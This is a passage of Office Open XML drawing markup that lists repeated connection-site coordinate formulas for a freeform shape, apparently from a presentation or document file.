              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 2625728 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8582666 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 291389 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 8582666 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 291389 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 304639 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 7367558 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 414127 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1858154 h 1858154"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1834080 h 1858154"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1820983 h 1858154"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1745922 h 1858154"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1706043 h 1858154"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1696181 h 1858154"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1649683 h 1858154"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1598895 h 1858154"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1448852 h 1858154"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1327025 h 1858154"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1264472 h 1858154"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1217376 h 1858154"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1158396 h 1858154"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1076277 h 1858154"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1012022 h 1858154"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 956092 h 1858154"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 892073 h 1858154"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 879041 h 1858154"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 744029 h 1858154"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 234941 h 1858154"/>
              <a:gd name="connsiteX22" fmla="*/ 8081033 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 341461 h 1858154"/>
              <a:gd name="connsiteX23" fmla="*/ 7367558 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 414127 h 1858154"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 155189 h 1858154"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 245 h 1858154"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 1858154"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 307021 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 8081033 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 413541 h 1930234"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 8522890 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 307021 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 8301962 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 118969 h 1930234"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 380664 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 8301962 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 118969 h 1930234"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1930234 h 1930234"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1906160 h 1930234"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1893063 h 1930234"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1818002 h 1930234"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1778123 h 1930234"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1768261 h 1930234"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1721763 h 1930234"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1670975 h 1930234"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1520932 h 1930234"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1399105 h 1930234"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1336552 h 1930234"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1289456 h 1930234"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1230476 h 1930234"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1148357 h 1930234"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1084102 h 1930234"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1028172 h 1930234"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 964153 h 1930234"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 951121 h 1930234"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 816109 h 1930234"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 380664 h 1930234"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 303076 h 1930234"/>
              <a:gd name="connsiteX23" fmla="*/ 8361738 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 7528 h 1930234"/>
              <a:gd name="connsiteX24" fmla="*/ 8917944 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 227269 h 1930234"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 72325 h 1930234"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 72080 h 1930234"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
